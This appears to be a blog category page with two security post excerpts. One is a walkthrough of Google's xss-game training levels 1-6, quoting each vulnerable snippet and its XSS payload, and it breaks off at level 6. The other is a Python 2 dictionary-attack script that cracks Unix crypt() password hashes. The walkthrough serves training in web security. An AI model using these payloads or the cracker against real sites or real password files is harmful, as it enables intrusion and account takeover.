Classification:Penetration

Classification (Penetration)'s result:

Google xss-game solution(level 1-6)

[1/6]  Level 1: Hello, world of XSS bug: message = “Sorry, no results were found for <b>” + query + “</b>.” message += ” <a href=’?’>Try again</a>.” # Display the results page self.render_string(page_header + message + page_footer) exp: <script>alert(/xss/)</script> [2/6]  Level 2: Persistence is key bug: html += “<blockquote>” + posts[i].message + “</blockquote”; …… var message = document.getElementById(‘post-content’).value; exp:<img src=1 onerror=”alert(/xss/)”> [3/6]  Level 3: That sinking feeling… bug: html += “<img src=’/static/level3/cloud” + num + “.jpg’ />”; exp:https://xss-game.appspot.com/level3/frame#2xss’ onerror=”alert(/xss/)” [4/6]  Level 4: Context matters bug: <img src=”/static/loading.gif” onload=”startTimer(‘{{ timer }}’);” /> exp:3′);alert(‘xss [5/6]  Level 5: Breaking protocol bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm <a href=”{{ next }}”>Next >></a> we can change the ‘next’ parameter. exp:https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/) then click go,and input email or everything [6/6]  Level 6: Follow the 🐇 bug: if (url.match(/^https?:\/\//)) {—————–bypass:t-T scriptEl.src = url; // Show log messages scriptEl.onload = function() { setInnerText(document.getElementById(“log”), “Loaded gadget from ” + url); …… // Take the value after # and use it as the gadget filename. function getGadgetName() { return window.location.hash.substr(1) || “/static/gadget.js”; } includeGadget(getGadgetName()); we……

Use python to crack Unix password

Environment:Ubuntu+python2.7 As we know,Unix use crypt() to encrypt password,so we can use crypt() to crack it. #!/usr/bin/python #coding:utf-8 #Author:LSA #Description:Use crypt() to crack Unix password #Date:20170219 import crypt def crackUnixPass(cryptPassword): salt = cryptPassword[0:2] dFile = open(‘dictionary.txt’,’r’) for word in dFile: word = word.strip(‘\r\n’) cryptWord = crypt.crypt(word, salt) if cryptWord == cryptPassword: print ‘Found password: ‘+word+’\n’ return print ‘Password not found.’ return def main(): pFile = open(‘passwords.txt’) for line in pFile: if ‘:’ in line: user = line.split(‘:’)[0] cryptPassword = line.split(‘:’)[1].strip(‘ ‘) print ‘Cracking password for: ‘+user crackUnixPass(cryptPassword) if __name__==’__main__’: main()